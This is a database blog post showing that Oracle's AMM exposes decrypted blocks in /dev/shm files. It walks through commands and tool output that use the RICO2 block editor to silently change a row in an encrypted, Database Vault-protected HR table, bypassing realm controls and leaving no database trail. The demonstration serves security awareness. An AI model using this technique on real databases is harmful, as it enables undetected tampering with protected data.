AMM vs security

18.05.2018
by Kamil Stawiarski

Most of us already know that AMM sucks. But usually, we think about disadvantages of AMM in terms of performance. Let’s see why it sucks in the terms of security 😉

Let’s create an encrypted tablespace for HR.EMPLOYEES and protect HR schema with Database Vault.

Contents of sqlnet.ora

view source
print?
1ENCRYPTION_WALLET_LOCATION=
2  (SOURCE=
3   (METHOD=FILE)
4    (METHOD_DATA=
5     (DIRECTORY=/etc/oracle/wallet/rico)))
view source
print?
1SQL> administer key management create keystore '/etc/oracle/wallet/rico' identified by "ZyrafyWchodzaDoSzafy";
2 
3keystore altered.
4 
5SQL> administer key management set keystore open identified by "ZyrafyWchodzaDoSzafy";
6 
7keystore altered.
8 
9SQL> !ls /etc/oracle/wallet/rico
10ewallet.p12
11 
12SQL> administer key management set key identified by "ZyrafyWchodzaDoSzafy" with backup;
13 
14SQL> ed
15Wrote file afiedt.buf
16 
17  create tablespace secure_data
18  2  datafile '/u01/app/oracle/oradata/orcl/secure_data01.dbf'
19  size 128m
20  4  autoextend on next 64m
21  5  maxsize 1g
22  6  encryption using 'AES256'
23  7* default storage (encrypt)
24SQL> /
25 
26Tablespace created.
27 
28SQL> alter table hr.employees move tablespace secure_data;
29 
30Table altered.
31 
32SQL> exec lbacsys.configure_ols
33 
34PL/SQL procedure successfully completed.
35 
36SQL> exec lbacsys.ols_enforcement.enable_ols
37 
38PL/SQL procedure successfully completed.

Now we will use dbca to configure a database for using Database Vault

view source
print?
1[oracle@rico ~]$ dbca -silent -configureDatabase -sourceDB orcl -dvConfiguration true -dvUserName db_master -dvUserPassword Oracle123
2Preparing to Configure Database
36% complete
413% complete
566% complete
6Completing Database Configuration
7100% complete
8Look at the log file "/u01/app/oracle/cfgtoollogs/dbca/orcl/orcl.log" for further details.
9 
10[oracle@rico ~]$ sqlplus db_master
11 
12SQL*Plus: Release 12.1.0.2.0 Production on Fri May 18 14:18:02 2018
13 
14Copyright (c) 1982, 2014, Oracle.  All rights reserved.
15 
16Enter password:
17Last Successful login time: Fri May 18 2018 14:17:05 +02:00
18 
19Connected to:
20Oracle Database 12c Enterprise Edition Release 12.1.0.2.0 - 64bit Production
21With the Partitioning, Oracle Label Security, OLAP, Advanced Analytics
22and Real Application Testing options
23 
24SQL> exec dbms_macadm.enable_dv
25 
26PL/SQL procedure successfully completed.
27 
28SQL> begin
29  2    dbms_macadm.CREATE_REALM(realm_name=>'HR_REALM',
30  3         description=>'Protect HR objects',
31  4         enabled=>dbms_macutl.g_yes,
32  5         audit_options=>dbms_macutl.g_realm_audit_fail,
33  6         realm_type=>1);
34  7  end;
35  8  /
36 
37PL/SQL procedure successfully completed.
38 
39SQL> begin
40  2    dbms_macadm.ADD_OBJECT_TO_REALM(realm_name=>'HR_REALM',
41  3          object_owner => 'HR',
42  4          object_name=>'%',
43  5          object_type=>'%');
44  6  end;
45  7  /
46 
47PL/SQL procedure successfully completed.
48 
49SQL> begin
50  2    DBMS_MACADM.ADD_AUTH_TO_REALM(
51  3       realm_name => 'HR_REALM',
52  4       grantee => 'HR',
53  5       auth_options => DBMS_MACUTL.G_REALM_AUTH_OWNER);
54  6  end;
55  7  /
56 
57PL/SQL procedure successfully completed.

Now even SYSDBA can’t select data from HR tables:

view source
print?
1SQL> conn / as sysdba
2Connected.
3SQL> select count(1) from hr.employees;
4select count(1) from hr.employees
5                        *
6ERROR at line 1:
7ORA-01031: insufficient privileges

You can’t also access data with tools like BBED or RICO2, because the tablespace is encrypted.

But let’s assume that someone with appropriate privileges started a transaction on a table we want to modify without leaving any trail in a database.

view source
print?
1SQL> conn hr/hr
2Connected.
3 
4SQL> update employees
5  set salary=salary*2
6  where employee_id=100;
7 
81 row updated.

As a SYSDBA we can check XID and DATA_OBJECT_ID for running transaction:

view source
print?
1SQL> select xid
2  from v$transaction t, v$session s
3  where t.ses_addr=s.saddr
4  and   s.username='HR';
5 
6XID
7----------------
803000C0001060000
9 
10SQL> select data_object_id
11  from dba_objects
12  where owner='HR'
13  and object_name='EMPLOYEES';
14 
15DATA_OBJECT_ID
16--------------
17     93291

Blocks are decrypted in memory and with AMM, memory is represented as files in /dev/shm.

So we can use RICO2 to tread /dev/shm files as datafiles.

view source
print?
1[oracle@rico ~]$ ls /dev/shm/*orcl* | awk '{print NR " " $0}' > listfile
2[oracle@rico ~]$ python rico2.py listfile
3RICO v2 by Kamil Stawiarski (@ora600pl | www.ora-600.pl)
4This is open source project to map BBED functionality.
5If you know how to use BBED, you will know how to use this one.
6Not everything is documented but in most cases the code is trivial to interpret it.
7So if you don't know how to use this tool - then maybe you shouldn't ;)
8 
9Usage: python2.7 rico2.py listfile.txt
10The listfile.txt should contain the list of the DBF files you want to read
11 
12 !!! CAUTION !!!!
13 
14This tool should be used only to learn or in critical situations!
15The usage is not supported!
16If found on production system, this software should be considered as malware and deleted immediately!
17 
181   /dev/shm/ora_orcl_30310405_0
192   /dev/shm/ora_orcl_30343174_0
203   /dev/shm/ora_orcl_30343174_1
21( ... removed for clarity ... )

Now we can search for a XID in correlation with DATA_OBJECT_ID:

view source
print?
1rico2 > find -xo 03000C0001060000:93291
2Found in block: 72,1934 block type: DATA

Now we can edit the block in a classic way:

view source
print?
1rico2 > set dba 72,1934
2    DBA     0x1200078e (301991822 72,1934)
3rico2 > p *kdbr[0]
4rowdata[6938]               @8126   0x2c
5-------------
6flag@8126:  0x2c
7lock@8127:  0x2
8cols@8128:  11
9 
10 
11col    0[2]     @8129:  c202
12col    1[6]     @8132:  53746576656e
13col    2[4]     @8139:  4b696e67
14col    3[5]     @8144:  534b494e47
15col    4[12]    @8150:  3531352e3132332e34353637
16col    5[7]     @8163:  78670611010101
17col    6[7]     @8171:  41445f50524553
18col    7[3]     @8179:  c30551
19col    8[0]     @8183:  *NULL*
20col    9[0]     @8184:  *NULL*
21col   10[2]     @8185:  c15b
22 
23 
24rico2 > set offset 8140
25rico2 > d
26 File: /dev/shm/ora_orcl_30343174_72(72)
27 Block: 1934 Offsets: 8140 to 8652      Dba: 0x1200078e
28---------------------------------------------------------------
294b696e67 05534b49 4e470c35 31352e31 | King.SKING.515.1
3032332e34 35363707 78670611 01010107 | 23.4567.xg......
3141445f50 52455303 c30551ff ff02c15b | AD_PRES...Q....[
32 
33<16 bytes per line>
34 
35rico2 > set mode edit
36rico2 > modify
37Usage: First - set offset to a place that you want to modify.
38Then: modify [-s bytestring | -h hex]
39rico2 > modify -s Dupa
40You want to modify block: 1934 at offset: 8140
41New value: 44757061
42Are you sure? (Y/N)  y
43Block data changed. To save changes set edit mode and type: save
44rico2 > sum apply
45checksum int = 1703
46checksum hex = 0x6a7
47Block data changed. To save changes set edit mode and type: save
48rico2 > save
49Current block data successfully saved to disk. To revert changes, type: dupa
50rico2 >

And now let’s check what happened in original session…

view source
print?
1SQL> select last_name
2  from employees
3  where employee_id=100;
4 
5LAST_NAME
6-------------------------
7Dupa

So now when a user will commit a session – our changes will be also saved to disk 😀

GDPR made security really popular lately. Just remember that buying expensive licenses for fancy products doesn’t mean you are fully secured 😉

Search:

Category:
choose
All categories 12c Exadata GO internals konferencje Oracle RAC RMAN RUST security tips&tricks tuning

Popular posts

14.06.2016
ORACLE RAC 12c: restore OCR and VOTEDISK

Let’s fuckup the cluster! Of course after this operation, the final state of the processes can look like this: The cssd service will not be able to start, because there are no voting disks: OK, so let’s try to stop the cluster services: Now we will have to start CRS in exclusive mode and start […]

Read more
10.02.2016
How to list files from directory using external table in 12c

I’ve wrote about privilege escalation with external tables in this post: https://blog.ora-600.pl/2014/12/23/simple-technics-of-privilege-escalation-part2-dbasysdba/ This time we will try to list all files within directory object, to which we have no EXECUTE privs. This is possible due to great new feature of database 12c that allows to use metacharacters to match multiple files in external table. I […]

Read more
28.05.2017
How to recover a dropped package from archivelogs – based on research for VOODOO engine

Sorry for long time without post, but we are writing with Marcin Rydz a new heterogenous replication product based on archivelogs and it’s consuming a looooooot of our time 🙂 Yes I know it’s nothing new on the market. There are other cool products and I know they’ll be probably be better. But we want […]

Read more
01.02.2017
back to the basics: ALTER TABLE MOVE vs SHRINK

It’s time for the next article with ODBV visualisation 🙂 This time let’s examine the difference between move and shrink – this is very common question on a lot of trainings. You can find a lot of great articles in the Internet regarding this subject but I think that visualisation really helps to understand what […]

Read more
03.05.2015
12c: Spatial Vector Acceleration

There is a new feature in Oracle Spatial 12c, called "Spatial Vector Acceleration". According to Oracle: One of the most notable improvements with Oracle Spatial and Graph 12c can be seen in performance increases in vector data operations. Enabling the Spatial Vector Acceleration feature (available with the Spatial option) dramatically improves the performance of commonly […]

Read more
30.12.2016
back to the basics: truncate table reuse storage vs drop storage

From time to time I get questions on my trainings, what is the difference between TRUNCATE TABLE and TRUNCATE TABLE DROP STORAGE… well, there is no difference because DROP STORAGE is default 😉 DROP STORAGE Specify DROP STORAGE to deallocate all space from the deleted rows from the table except the space allocated by the […]

Read more
28.10.2017
Visualize your STATSPACK reports with Python Plotly

If you work as a consultant, getting remote access to your customer is sometimes a nightmare! Even when you’ll get one, there a times when you just want to get your job done and finish this nightmare. For example, there are times when it is easier to dump a statspack repo and do offline analyzes. […]

Read more
08.02.2016
Sparc M7 vs Intel and P8

I had a pleasure to work with my colleagues from Oracle – Radosław Kut and Krzysztof Marciniak – at comparing the performance of In-Memory queries between Sparc M7, Intel® Xeon® X5670 and Intel® Xeon® E5-2699. You can find results of our findings in this presentation: https://www.oracle.com/webfolder/s/delivery_production/docs/FY16h1/doc17/DB12c-on-SPARC-M7.pdf Following their methodology I’d like to present appropriate results […]

Read more
29.10.2015
Oracle 12c: PRAGMA UDF – the truth

Let’s check, why PRAGMA UDF makes execution faster, then regular function. C function responsible for calling a PL/SQL code from SQL is called "plsql_run": Now let’s try to create a new HR session and create a simple function which will multiple values by 2: From other terminal I will connect to the HR session with […]

Read more
12.03.2017
ODBV improvements

Thanks to suggestions made by Frits Hoogland, I made some improvements to the ODBV. The new version can be found here: http://ora-600.pl/oinstall/odbv.x86_64 The changes are: Recognition of first, second and third level bitmap block Recognition of pagetable segment header Block number ranges on the left side The blocks will be coloured properly to belonging segment. […]

Read more
03.11.2016
Oracle Database Block Visualizer

Recently I wanted to demonstrate to some people on my training, how Oracle database maintains blocks in a datafile – what happens after truncate, truncate with drop storage clause, delete, regular insert, direct path insert and so on… I didn’t find any tool for that so I’ve written my own. It’s core code is based […]

Read more
10.02.2024
[SOLVED!] ORA-39405: Oracle Data Pump does not support importing from a source database with TSTZ

This is a pain in the ass. You try to import something from a newer database and you hit the error that your timestamp is not good enough! Even tho you have no timestamp datatypes in the dump… The whole case was covered by Mike Dietrich: Let me show you my – a little bit […]

Read more

Contact us

Database Whisperers sp. z o. o. sp. k.
al. Jerozolimskie 200, 3rd floor, room 342
02-486 Warszawa
NIP: 5272744987
REGON:362524978
+48 508 943 051
+48 661 966 009
info@ora-600.pl

Newsletter Sign up to be updated